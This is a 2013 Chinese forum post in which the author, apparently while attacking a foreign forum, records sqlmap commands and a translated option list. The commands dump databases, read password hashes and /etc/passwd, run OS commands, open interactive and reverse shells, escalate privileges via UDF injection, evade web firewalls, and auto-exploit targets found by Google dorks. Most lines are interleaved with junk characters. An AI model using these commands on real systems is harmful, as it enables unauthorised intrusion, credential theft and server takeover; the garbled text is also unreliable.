今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、& @& L+ J9 k0 e( y- Y
sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称) Y; l) |9 U# h" g% L) o
sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名8 s; H7 W- M- `8 E* U3 E4 r# T
sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
# k5 L% ]! n2 { 9 A2 q. ]/ G0 C! S( [6 i$ ?. @+ |* m
sqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v7 T, Y1 y0 U; d2 [) _0 ]
0 #获取字段内容( Y5 y2 ~7 B/ i; s6 k( @/ p. H' R
Z+ l+ P$ W! b" |******************信息获取******************# B! N! O9 j) Q5 C d
sqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型! V( F0 c9 i: J
sqlmap -u “http://url/news?id=1″ –users #列数据库用户* z) q1 h/ X2 f$ @" m- i6 r. {- y
sqlmap -u “http://url/news?id=1″ –dbs#列数据库
5 y3 W; J6 b1 B/ Zsqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码$ ]5 O% p, J( j G' x# }" N
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码6 y+ |, h* Y b; |. o
sqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”( L; k, j: m- O1 b4 D
–start 1 –stop 20 #列出指定字段,列出20 条
# E% f, b8 n4 A0 A( x/ }9 Q0 csqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表9 {1 W- v d% W
sqlmap -u “http://url/news?id=1″ –privileges #查看权限
( e' b4 ^. G8 {' x: a( Vsqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
l8 D# C# ?( ?8 J# ?2 Dsqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)& @- u1 r0 {: _# w/ s
sqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
* ~4 V2 T$ {3 T! Vsqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
. [$ X4 n2 s5 ?6 G* Y) {2 S( wsqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入
( D8 Z8 H# E* ?6 D }sqlmap -u “http://url/news?id=1″-b #获取banner信息% x( s5 V; j6 G1 g
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入, s& I! c8 @& u
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
% s* A% y' l, s: ?sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入
% d7 g* ?; J8 d' Asqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词; G' x7 v$ g" \. P
sqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令: o j) a4 v3 }. B! N: S; e
sqlmap -u “http://url/news?id=1″ –file /etc/passwd. E4 v7 H& c. e: y* d
sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令
) r3 s' m* l$ f9 x5 o7 v: L/ C0 Xsqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell5 r9 n4 f0 ]; C+ L, Z& Z( \" q
sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表1 j7 @: h# R% l$ p# f1 Z
sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度$ @" H4 ?$ g; J( N: j# ~
sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度
! Q( E- `* U j. e- P4 x+ Z# Y***********高级用法*************
* D8 B2 u6 R! j9 Z2 C2 u) `8 j0 a6 t-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入
( S% w9 ~6 W( B. K. esqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问
0 V( f. r! o6 p6 e–technique 测试指定注入类型\使用的技术& N: E, E0 {0 \0 s
不加参数默认测试所有注入技术 A/ F! P' h' X0 x
• B: 基于布尔的SQL 盲注
; P5 G/ ~& |) _/ b• E: 基于显错sql 注入
4 h# Z( m' {. @$ y% [, d• U: 基于UNION 注入
5 f, F. ~ L- g# A) ~• S: 叠层sql 注入
2 d8 s; L- V3 b7 k; x* v% A• T: 基于时间盲注7 C9 [& y* @" ?0 {
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char()
6 w9 {( w4 }2 a% a* C+ A! `' l# @–tamper 插件所在目录
$ x3 t9 O. B+ w4 p\sqlmap-dev\tamper3 v& H$ [" I3 D4 x. u5 h' E
sqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能, p6 y' Q' ^5 Z( ]9 n% w, [
level 执行测试等级 攻击实例:
& f2 g* ]/ @1 iSqlmap -u “http://url/news?id=1&Submit=Submit”
; V5 `7 @( p$ _1 h1 l–cookie=”PHPSESSID=41aa833e6d0d
% ^& a/ \ H* b5 q28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user
- c, F" }4 P% ~1 v/ y, W–password: }1 H3 s; Q" D
参考文档:http://sqlmap.sourceforge.net/doc/README.html
4 n4 d. S1 \, e***********安装最新版本*************
( n4 |0 B& }3 N# Z/ wubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版
; }! k! S: W+ q9 ^8 |. Q3 fsudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
4 N% n( |5 B4 y% ]/ {安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件* D. n7 k9 q9 M
sudo vim /home/当前用户/.bashrc# }( Y; Z' f/ _; |( B1 {1 t7 o
#任意位置加上:
* `3 [- N+ x) n) t u0 calias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效
* }! V3 q% x) z3 k: c7 E1 W如果想对所有用户有效 可设置全局 编辑下面的文件
5 \' V4 \/ V( }% D% s) D3 T! P, uvim /etc/profile8 r ?) u* A9 o1 x) I" m
同样加上:
F% S5 m$ i. ]. v1 palias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
3 ^5 N5 T: u% l; u6 [$ b1 u******************windows 7 (x64) sqlmap install (SVN)************
9 ?! M" r4 b# d# }6 J' shttp://www.python.org/getit/ 安装python
& |0 K1 j. \$ g# u7 hhttp://www.sliksvn.com/en/download 安装windows svn client
! {1 C4 J# r& A5 C t. ~5 \svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
# s, n2 L4 f! w& N安装sqlmap& c& @% ^" g5 m; l2 X
*修改环境变量
4 |4 ~) y) a% s2 V3 W–version 显示程序的版本号并退出5 {$ g& x4 h1 K2 K6 a5 T
-h, –help 显示此帮助消息并退出" h2 K$ h, b* ~
-v VERBOSE 详细级别:0-6(默认为1)" x1 x( c8 D* o1 x* v
Target(目标): 以下至少需要设置其中一个选项,设置目标URL。
8 ]2 j2 A2 S6 }-d DIRECT 直接连接到数据库。, x0 I+ R/ q6 D" u0 N
-u URL, –url=URL 目标URL。( x' R6 e' ~, Z. \* f+ j
-l LIST 从Burp 或WebScarab 代理的日志中解析目标。 Y/ |/ m' G; B* `" ^4 P. |
-r REQUESTFILE 从一个文件中载入HTTP 请求。# O8 H0 E6 G( C1 x+ K
-g GOOGLEDORK 处理Google dork 的结果作为目标URL。
1 G1 U1 t( _% c-c CONFIGFILE 从INI 配置文件中加载选项。
& M+ v( d6 e' {, F9 mRequest(请求)::; ?* H4 U o5 U" e1 V2 ^
这些选项可以用来指定如何连接到目标URL。2 L$ { Z4 K" d, Q, b2 u
–data=DATA 通过POST 发送的数据字符串
; M4 F; k/ I z6 W# d- A( a7 ~5 w–cookie=COOKIE HTTP Cookie 头& @; f5 `$ L4 X. ^
–cookie-urlencode URL 编码生成的cookie 注入
' e: r6 h8 D- H/ z–drop-set-cookie 忽略响应的Set –Cookie 头信息$ ]: l& d3 _ v& Z" M$ @
# G X! a7 d( }) S( A–user-agent=AGENT 指定 HTTP User –Agent 头% K' |+ n* S/ N) z/ J. f+ s
–random-agent 使用随机选定的HTTP User –Agent 头0 @) e0 z& R" @: y6 v% ?
–referer=REFERER 指定 HTTP Referer 头) G0 P& T- O- L& _! S& W. q f
–headers=HEADERS 换行分开,加入其他的HTTP 头3 s: x K% P! k9 I0 Q1 m m8 f* N% Y
–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)" J* q7 @2 }: a) f+ y; r2 k. W
–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码): b) E7 v- }" t. A! J
–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)" Y2 R6 t9 ?" S! L
–proxy=PROXY 使用HTTP 代理连接到目标URL9 w( g) g, A) I
–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)% {/ D( P* H4 Y' H* d
–ignore-proxy 忽略系统默认的HTTP 代理
& D0 ]6 k) I! b9 L–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒! V4 k# S/ s7 t% ` Q1 U! F
–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)
+ V9 b) @. f( }2 c9 Q+ i* x# ?–retries=RETRIES 连接超时后重新连接的时间(默认3)
) m; l6 m5 L' d–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
- }* i, {: [$ S3 ~, L- w5 G; e7 s–safe-url=SAFURL 在测试过程中经常访问的url 地址( Y* ]) z$ v+ \: E% Y
–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL. x, I& Y {7 {% x8 l0 N$ K
Optimization(优化): 这些选项可用于优化SqlMap 的性能。
! d t" U$ n( C6 @# s-o 开启所有优化开关% Z: o- A& q. i
–predict-output 预测常见的查询输出' z" w% L' [* Y+ S
–keep-alive 使用持久的HTTP(S)连接
& e' @, e" Y7 c8 @–null-connection 从没有实际的HTTP 响应体中检索页面长度
) f/ U) s0 M3 R0 r: F% Z–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)
+ o6 q9 `* z6 [4 p' A: \Injection(注入):
' t/ A# L h; \这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
9 X( o2 w, j" l' _-p TESTPARAMETER 可测试的参数(S)
) j) u+ R* R: E" u–dbms=DBMS 强制后端的DBMS 为此值
. _; P Y, I8 d w–os=OS 强制后端的DBMS 操作系统为这个值& O2 p9 j# ]# a$ T8 h7 ^" Q9 E
–prefix=PREFIX 注入payload 字符串前缀
/ K/ v, T! n; C' y* {0 P5 X; [–suffix=SUFFIX 注入 payload 字符串后缀7 V/ K3 X0 v& M6 _/ `
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据
( C' ?0 D/ q7 \- a! |Detection(检测):* _. Y8 q2 V: l% A8 a2 W
这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。
. k; R0 E2 x H K( _3 u–level=LEVEL 执行测试的等级(1-5,默认为1)9 {7 k8 J4 R* _3 h& v8 A3 G: {
–risk=RISK 执行测试的风险(0-3,默认为1)
/ v P0 b3 o( l) x% A–string=STRING 查询时有效时在页面匹配字符串
! U; u7 C7 _( v& Q/ a% v( z–regexp=REGEXP 查询时有效时在页面匹配正则表达式- G: S, _: q1 i; _) v- I, E- V
–text-only 仅基于在文本内容比较网页
; W7 a; ~, d' O) I5 h, G8 HTechniques(技巧): 这些选项可用于调整具体的SQL 注入测试。' @, s: z/ u' X2 V+ H: i
–technique=TECH SQL 注入技术测试(默认BEUST): q" e) o5 y! H9 V2 Z9 o4 a0 `. B
–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒)
5 k; k4 Z6 _$ J–union-cols=UCOLS 定列范围用于测试UNION 查询注入! J$ L6 s( r2 x, o
–union-char=UCHAR 用于暴力猜解列数的字符
4 Z& l/ ~& z' ^+ |) e6 D/ g2 Z$ ZFingerprint(指纹):; D2 B5 x' C; _, F; {3 R
-f, –fingerprint 执行检查广泛的DBMS 版本指纹, T2 F# G' H3 z( Y. d
Enumeration(枚举):
$ {# J& N7 I7 @' Q4 j2 | 1 W& ?4 I% i# ^5 h0 l3 i
这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。4 ]- j& I3 W! i3 l0 a7 q$ H
-b, –banner 检索数据库管理系统的标识) Y/ i0 i! |7 D4 j$ l/ W
–current-user 检索数据库管理系统当前用户) ]+ z; p! j, \0 k! C0 t
–current-db 检索数据库管理系统当前数据库
8 f: j! S, J' X; h, F- A–is-dba 检测DBMS 当前用户是否DBA
" \/ g( Z; W, T. V _–users 枚举数据库管理系统用户
; n @9 c! {: \8 F2 Y–passwords 枚举数据库管理系统用户密码哈希2 O& |' m/ {& [6 l% s
–privileges 枚举数据库管理系统用户的权限
. _3 P5 n- L2 ^9 a–roles 枚举数据库管理系统用户的角色2 b! B! L8 k; K9 @ m
–dbs 枚举数据库管理系统数据库7 R0 k P* L+ W
–tables 枚举的DBMS 数据库中的表9 {' L/ {/ e" W1 N& M, t
–columns 枚举DBMS 数据库表列
: E& @% K( P1 D8 q8 ~9 x. o! p–dump 转储数据库管理系统的数据库中的表项
- T+ m g5 t1 c8 I% C–dump-all 转储所有的DBMS 数据库表中的条目
8 ~3 t8 U: x7 l7 j* d–search 搜索列(S),表(S)和/或数据库名称(S)
+ y8 \' R4 T5 X6 G. w-D DB 要进行枚举的数据库名7 W/ u8 G5 f! P9 ?* T3 h) s
-T TBL 要进行枚举的数据库表' V/ p( ]* S+ B2 ?7 x: m; J
-C COL 要进行枚举的数据库列0 y1 u: y* X X0 w$ N
-U USER 用来进行枚举的数据库用户# k! L! ]2 i% W5 Q
–exclude-sysdbs 枚举表时排除系统数据库! Z0 N' K3 r4 P% M. [8 Y* d
–start=LIMITSTART 第一个查询输出进入检索
6 t: E8 S; O9 _1 |- x9 u" P–stop=LIMITSTOP 最后查询的输出进入检索
8 A$ C! }3 [. R9 X$ R. h–first=FIRSTCHAR 第一个查询输出字的字符检索3 P3 W" O' U8 ^
–last=LASTCHAR 最后查询的输出字字符检索
6 k, e, A$ H5 c. G$ }1 o–sql-query=QUERY 要执行的SQL 语句2 S, c1 ?: u2 S, o2 v" u
–sql-shell 提示交互式SQL 的shell
9 H2 u( C9 V6 J$ V' DBrute force(蛮力): 这些选项可以被用来运行蛮力检查。
: ~8 C% ?+ [ P9 s3 X–common-tables 检查存在共同表6 K+ M6 [8 S0 O6 \. [( O1 n
–common-columns 检查存在共同列; t. R3 A* b" a w, G; ~
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。
/ M2 f& ?# m6 {. _, o7 w. Y: p–udf-inject 注入用户自定义函数
* Y2 L! P1 W2 b0 A1 Z9 u–shared-lib=SHLIB 共享库的本地路径
5 d6 S1 @1 `# g+ b; IFile system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。
$ E; ~4 b- G9 r. G' l. [–file-read=RFILE 从后端的数据库管理系统文件系统读取文件0 _7 k8 `4 x2 r2 u. Y; ^) G7 F' R9 ]+ e1 N
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
# \0 F& i$ O i) z$ q4 [! H( e8 E–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径/ \1 h% y1 `" }1 o/ D; \2 i
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。9 j) T% K1 e4 O% p
–os-cmd=OSCMD 执行操作系统命令" i5 h" {6 i' z/ s2 V5 Q: C) M: G
–os-shell 交互式的操作系统的shell
0 B; b1 [' C& J- r–os-pwn 获取一个OOB shell,meterpreter 或VNC4 r1 j3 Q6 {1 J0 ]' m
–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC2 t, W, q& e8 @
–os-bof 存储过程缓冲区溢出利用
4 r' Q- T0 g; A–priv-esc 数据库进程用户权限提升3 h3 C! Q4 `. r4 y
–msf-path=MSFPATH Metasploit Framework 本地的安装路径; t7 J2 p' s( ?! K9 q
–tmp-path=TMPPATH 远程临时文件目录的绝对路径
0 a0 I$ e& H) J5 O! s
6 r# P8 r( F/ @Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。
Z, H. f- }% d–reg-read 读一个Windows 注册表项值
# b/ }/ J5 h0 z6 z1 ]–reg-add 写一个Windows 注册表项值数据, f& }4 b1 Q3 z7 r2 H
–reg-del 删除Windows 注册表键值$ B+ Y: h4 W$ |8 J0 d
–reg-key=REGKEY Windows 注册表键
0 c4 r9 E2 u' D–reg-value=REGVAL Windows 注册表项值
4 U0 v) ^" x# O1 i1 z–reg-data=REGDATA Windows 注册表键值数据, ?7 C+ _. E5 `* Y
–reg-type=REGTYPE Windows 注册表项值类型/ K4 P7 h# @7 Y" m; E1 M
General(一般): 这些选项可以用来设置一些一般的工作参数。) n$ }( H# w7 I8 h
-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中- E7 O* `+ D* @9 |2 ]
-s SESSIONFILE 保存和恢复检索会话文件的所有数据3 E1 a# e: B; s1 Z2 y: O3 |
–flush-session 刷新当前目标的会话文件
. y, L) t; a; \! B( ]: _/ G7 F–fresh-queries 忽略在会话文件中存储的查询结果" G2 V: W' b: }# B* t
–eta 显示每个输出的预计到达时间
; i8 Y( H- J/ R& j) E1 Q9 U–update 更新SqlMap
# o k; l a, O–save file 保存选项到INI 配置文件
( D- [/ n, P) Y4 R9 X: }0 _–batch 从不询问用户输入,使用所有默认配置。
2 B! W; H% B) ]$ LMiscellaneous(杂项):2 ?' o2 A- O" z Q$ `" W7 Q* M$ x
–beep 发现SQL 注入时提醒9 i6 R0 W4 Y& q% B
–check-payload IDS 对注入payloads 的检测测试8 C0 R/ {! U1 Y# B( T3 N
–cleanup SqlMap 具体的UDF 和表清理DBMS
! }9 u. H0 M0 }; h- Q–forms 对目标URL 的解析和测试形式
7 {5 y, @- X' k/ Q' S% T" [–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
0 X D2 C7 |$ W/ J. [–page-rank Google dork 结果显示网页排名(PR)
- ]! J* b! W/ e* j6 o0 A–parse-errors 从响应页面解析数据库管理系统的错误消息, |. x7 k) G1 y5 d" N
–replicate 复制转储的数据到一个sqlite3 数据库
# _+ n, m1 P1 E2 y3 A! n% T$ v–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址. o8 R. Y; R) d5 c8 O5 A- g' b
–wizard 给初级用户的简单向导界面 |
发表于 2013-4-4 22:26:32
收藏
支持
反对